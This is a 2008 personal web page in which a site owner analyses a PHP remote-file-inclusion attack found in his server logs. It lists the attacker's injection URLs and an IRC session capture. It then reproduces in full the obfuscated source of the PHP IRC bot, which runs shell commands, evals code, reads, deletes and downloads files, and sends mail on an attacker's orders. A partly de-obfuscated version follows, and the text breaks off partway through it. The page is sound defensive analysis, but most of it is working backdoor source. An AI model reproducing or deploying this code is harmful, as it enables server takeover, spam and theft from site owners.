Lagom.nl > Web > PHP attack

PHP attack

Today (20 Mar 2008), I found a lot of entries like this in my web server log:

85.69.22.109 - - [19/Mar/2008:06:19:09 +0100] "GET /obforums/viewtopic.php?id=http://myluckypotparty.by.ru/images? HTTP/1.1" 200 2673 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Apparently this is some attack on buggy PHP scripts to make them download some other page and execute it, since the above URL (myluckypotparty.by.ru/images) is a PHP script being served as text. Other URLs are

viewtopic.php?id=http:// cherrygirl.h18.ru/images/cs.txt?
viewtopic.php?id=http:// ninaru.hut2.ru/images/cs.txt?
viewtopic.php?id=http:// thepotparty.eclub.lv/images?
viewtopic.php?id=http:// holegirl.eclub.lv/.images/pictureofme?
viewtopic.php?id=http:// amyru.h18.ru/images/cs.txt?
viewtopic.php?id=http:// migirlsadaoiwqiseatmeisum.mail333.su/body?
viewtopic.php?id=http:// levispotparty.eclub.lv/images?

(spaces inserted into the URL to discourage search engines from following these links)

My web server scripts don't seem to be vulnerable, but out of curiosity, I tried running the script from an unprivileged account and analyzing the network traffic with Wireshark. Apparently it logs in to an IRC server on IP 121.119.172.49 (naibukansa.info, p4n33123e.dd.blueline.be). I suppose that it will try to get instructions for sending spam. Here is the TCP stream:

PASS secretpass
USER zcxocgdqk 127.0.0.1 localhost :bhmjykgox
NICK bhmjykgox
:hub.58240.net 001 bhmjykgox :bhmjykgox!zcxocgdqk@MY_HOSTNAME.MY_ISP.nl
:hub.58240.net 1 bhmjykgox :Login:
:hub.58240.net 376 bhmjykgox :
MODE bhmjykgox -x+i
JOIN ##p md5hash
MODE bhmjykgox -x+i
JOIN ##p md5hash
:bhmjykgox!zcxocgdqk@pizza.xs4all.nl JOIN :##p
:hub.58240.net 332 bhmjykgox ##p :
:hub.58240.net 353 bhmjykgox @ ##p :bhmjykgox
:hub.58240.net 366 bhmjykgox ##p :
Host Disconnected

Raw PHP script code

The PHP script looks like this:
<!-- THIS SEEMS TO BE SPAM-RELATED WEB SERVER EXPLOIT CODE - DO NOT RUN THIS CODE -->
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==",
 "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=",
 "tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) {
$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() {
global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14");
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) {
$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c);
if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke']));
} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]);
} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) {
$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd);
$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1);
$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1");
} for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<count($zdfff0a7fa1a55);$i865c0c0b4ab0e++) { if($zdfff0a7fa1a55[$i865c0c0b4ab0e] == "-s") {
$d73be252ca8221 = TRUE; } } if ($h6e2baaf3b97db[1] == "332") { $e01b6e20344b68 = $h6e2baaf3b97db[3];
} elseif ($h6e2baaf3b97db[2] == $m8052146769b14) { $e01b6e20344b68 = $v7c6483ddcd99e; } else { $e01b6e20344b68 = $h6e2baaf3b97db[2];
} if ($zdfff0a7fa1a55[0] == PHP_OS) { array_shift($zdfff0a7fa1a55); } if (substr($zdfff0a7fa1a55[0],0,1) == $aec12e0af93cb5['tr']) {
if (isset($see11cbb19052e[$m67b3dba8bc677]) || $h6e2baaf3b97db[1] == "332") { switch (substr($zdfff0a7fa1a55[0],1)) {
case l69923efad5b7a("sKM="): if ($h6e2baaf3b97db[1] != "332") { $see11cbb19052e[$m67b3dba8bc677] = FALSE;
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, htmen("b3V0")); } break; case l69923efad5b7a("qGWaoKKb"):
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6SSBRVUlU")); fclose($j351a1d2ad68bc); exit(0);
break; case l69923efad5b7a("tpWs"): if (count($zdfff0a7fa1a55)>1) { q56eacb300613d($j351a1d2ad68bc, substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("sKc="): if (isset($zdfff0a7fa1a55[1])) { $u954eef6d6eac5 = $zdfff0a7fa1a55[1];
} else { $u954eef6d6eac5 = getcwd(); } if (is_dir($u954eef6d6eac5)) { if (($o736007832d216 = opendir($u954eef6d6eac5))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$u954eef6d6eac5."\2");
while (($k435ed7e9f07f7 = readdir($o736007832d216)) !== FALSE) { if ($k435ed7e9f07f7 != "." && $k435ed7e9f07f7 != "..") {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> (".filetype($u954eef6d6eac5."/".$k435ed7e9f07f7).") $k435ed7e9f07f7");
sleep(1); } } closedir(); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$u954eef6d6eac5."\2");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8=") . " \2".$u954eef6d6eac5."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
} break; case l69923efad5b7a("p5Wp"): if (count($zdfff0a7fa1a55) > 1) { if (is_file($zdfff0a7fa1a55[1])) {
if (($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[1],"r"))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$zdfff0a7fa1a55[1]."\2");
while(!feof($k0666f0acdeed3)) { $m6438c669e0d0d = trim(fgets($k0666f0acdeed3,256)); df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> $m6438c669e0d0d");
sleep(1); } df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> [EOF]"); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$zdfff0a7fa1a55[1]."\2 for reading.");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8=") . " \2".$zdfff0a7fa1a55[1]."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
} } break; case l69923efad5b7a("tKuZ"): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break; case l69923efad5b7a("p5g="): if (count($zdfff0a7fa1a55) > 1) { if (chdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$zdfff0a7fa1a55[1]);
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
} } break; case l69923efad5b7a("tqE="): if (count($zdfff0a7fa1a55) > 1) { if (unlink($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("uKOqlZs="): if (count($zdfff0a7fa1a55) > 1) { if (touch($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("t62inpySoA=="): if (count($zdfff0a7fa1a55) > 2) { if (symlink($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p5ykqaE="): if (count($zdfff0a7fa1a55) > 2) { if (chown($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("p5yioZc="): if (count($zdfff0a7fa1a55) > 2) { if(chmod($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$zdfff0a7fa1a55[1]."\2 with permissions \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("sZ+Zm6U="): if (count($zdfff0a7fa1a55) > 1) { if (mkdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("tqGZm6U="): if (count($zdfff0a7fa1a55)>1) { if (rmdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p6Q="): if (count($zdfff0a7fa1a55) > 2) { if (copy($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("sZWeng=="): if (count($zdfff0a7fa1a55)>4) { $p099fb995346f3 = "From: <".$zdfff0a7fa1a55[2].">\r\n";
if (mail($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[3], substr($n78e731027d8fd,$zdfff0a7fa1a55[4]), $p099fb995346f3)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Send failure");
} } break; case l69923efad5b7a("sZ+ilmg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUQ1Ly8=") . " ".md5($zdfff0a7fa1a55[1]));
break; case l69923efad5b7a("qKKo"): if (isset($zdfff0a7fa1a55[1])) { $m957b527bcfbad = explode(".",$zdfff0a7fa1a55[1]);
if (count($m957b527bcfbad)==4 && is_numeric($m957b527bcfbad[0]) && is_numeric($m957b527bcfbad[1]) && is_numeric($m957b527bcfbad[2]) && is_numeric($m957b527bcfbad[3])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyaddr($zdfff0a7fa1a55[1]));
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyname($zdfff0a7fa1a55[1]));
} } break; case l69923efad5b7a("tpmoppSWqQ=="): q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
fclose($j351a1d2ad68bc); rfc35fdc70d5fc(); break; case l69923efad5b7a("tqI="): if(isset($zdfff0a7fa1a55[1])) {
$m8052146769b14 = ad988971435842((int)$zdfff0a7fa1a55[1]); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else { $m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} break; case l69923efad5b7a("tJyl"): if (count($zdfff0a7fa1a55) > 1) { eval(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("q5mp"): if (count($zdfff0a7fa1a55) > 2) { if (!($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[2],"w"))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
} else { if (!($eb5eda0a74558a = file($zdfff0a7fa1a55[1]))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
} else { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < count($eb5eda0a74558a); $i865c0c0b4ab0e++) { fwrite($k0666f0acdeed3,$eb5eda0a74558a[$i865c0c0b4ab0e]);
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8=") . " \2".$zdfff0a7fa1a55[1]."\2 downloaded to \2".$zdfff0a7fa1a55[2]."\2");
} fclose($k0666f0acdeed3); } } break; case l69923efad5b7a("sp0="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case l69923efad5b7a("t50="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case l69923efad5b7a("tKOnpqKUmuw="): if (isset($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { if (fsockopen($zdfff0a7fa1a55[1],(int)$zdfff0a7fa1a55[2],$t56bd7107802eb,$m341be97d9aff9,5)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Open\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Closed\2");
} } break; case l69923efad5b7a("uaKWn5g="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
break; case l69923efad5b7a("rZg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("SUQvLw==")." ".getmypid());
break; case l69923efad5b7a("p6GZ"): if (count($zdfff0a7fa1a55)>1) { $p1dccadfed7bcb = popen(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])),"r");
while (!feof($p1dccadfed7bcb)) { $k734515cbd3636 = trim(fgets($p1dccadfed7bcb,512)); if (strlen($k734515cbd3636)>0) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> ".$k734515cbd3636); sleep(1); }
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("PiBbRU9GXQ=="));
} break; case l69923efad5b7a("qayalaiYmg=="): h54d54a126a783(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
break; } } else { switch(substr($zdfff0a7fa1a55[0],1)) { case l69923efad5b7a("bg=="): if (isset($zdfff0a7fa1a55[1]) && md5($zdfff0a7fa1a55[1]) == jf9feaa9bcab30($aec12e0af93cb5['pa']) && preg_match(jf9feaa9bcab30($aec12e0af93cb5['ha']),$m67b3dba8bc677)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UmVhZHkvLyBPaw=="));
$see11cbb19052e[$m67b3dba8bc677] = TRUE; } else { df2f4e964f79d0($j351a1d2ad68bc, FALSE, jf9feaa9bcab30($aec12e0af93cb5['ch']), ob5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
} break; } } } } $td707b8140a662 = $f7fabc1404929c; } fclose($j351a1d2ad68bc); sleep(3); rfc35fdc70d5fc();
} else { shuffle($b59b514174bffe); rfc35fdc70d5fc(); } } function q56eacb300613d($s317d37b0edc7b, $n78e731027d8fd) {
fwrite($s317d37b0edc7b,"$n78e731027d8fd\r\n"); } function df2f4e964f79d0($s317d37b0edc7b, $d73be252ca8221, $e01b6e20344b68, $n78e731027d8fd) {
if($d73be252ca8221 != TRUE) { q56eacb300613d($s317d37b0edc7b, ob5d21085bf2c0("UFJJVk1TRw==")." $e01b6e20344b68 :$n78e731027d8fd");
} } function l69923efad5b7a($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function ad988971435842($wfac65290966c7) { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < $wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $t2cb9df9898e55 = "r-".$t2cb9df9898e55;
return $t2cb9df9898e55; } function h54d54a126a783($n111ca5df4a68b) { $y9b207167e5381 = ''; if (!empty($n111ca5df4a68b))
 { if(function_exists('exec')) { @exec($n111ca5df4a68b,$y9b207167e5381); $y9b207167e5381 = join("\n",$y9b207167e5381);
} elseif(function_exists('shell_exec')) { $y9b207167e5381 = @shell_exec($n111ca5df4a68b); } elseif(function_exists('system'))
 { @ob_start(); @system($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')) { @ob_start(); @passthru($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($k8fa14cdd754f9 = @popen($n111ca5df4a68b,"r"))) { $y9b207167e5381 = "";
while(!@feof($k8fa14cdd754f9)) { $y9b207167e5381 .= @fread($k8fa14cdd754f9,1024); } @pclose($k8fa14cdd754f9);
} } return $y9b207167e5381; } function jf9feaa9bcab30($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function gfb0daa8f01135($wfac65290966c7) { $t2cb9df9898e55 = ""; for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<$wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $t2cb9df9898e55; } rfc35fdc70d5fc(); ?> 

Cleaned-up script code

With some formatting, search/replace of variable and function names, and base64-decoding of strings, the script becomes slightly more readable. I may have made mistakes, though.
<? php				// -*-mode:php-*-

// this seems to be some exploit code that connects to an IRC server. Better not run this script!

set_time_limit(0);
ini_set("max_execution_time", 0);
set_magic_quotes_runtime(0);
ini_set('output_buffering', 0);

error_reporting(0);
ignore_user_abort();
$v1 = array("po" =>8080, "sp" =>'uJijk4iVsIXRmQ==',
	    "ch" =>'aFaw', "ke" =>'spd1iYSUqA==',
	    "ha" =>'dG1qQk1halK/nE6N',
	    "pa" =>'fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=',
	    "tr" =>"*", 'mrnd' =>9, "mo" =>'cqtrig==',
	    "ve" =>b64('varX'));

// added by Han-Kwang to improve readability of the code
function b64($s)
{
  return base64_encode($s);
}

function
f1($v2)
{

  $v2 = str_replace(" ", "", $v2);
  return $v2;
}

function
f2($v2)
{

  $v2 = base64_decode(f1($v2));
  return $v2;
}

function
main()
{

  global $v1;
  $v3 = array();
  $v4 = "";
  $v5 =
    array('sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==',
	  'sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR', 'rpihlYyTr5LWVKHDi6SRl0+jko4=',
	  'rZytgpFPr5TDlI7MmW6FiQ==', 'sKJuhYdPopDTi5bHlKVRhoY=',
	  'tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ', 'vaOokJFUbpPOi5jClLNRhoY=',
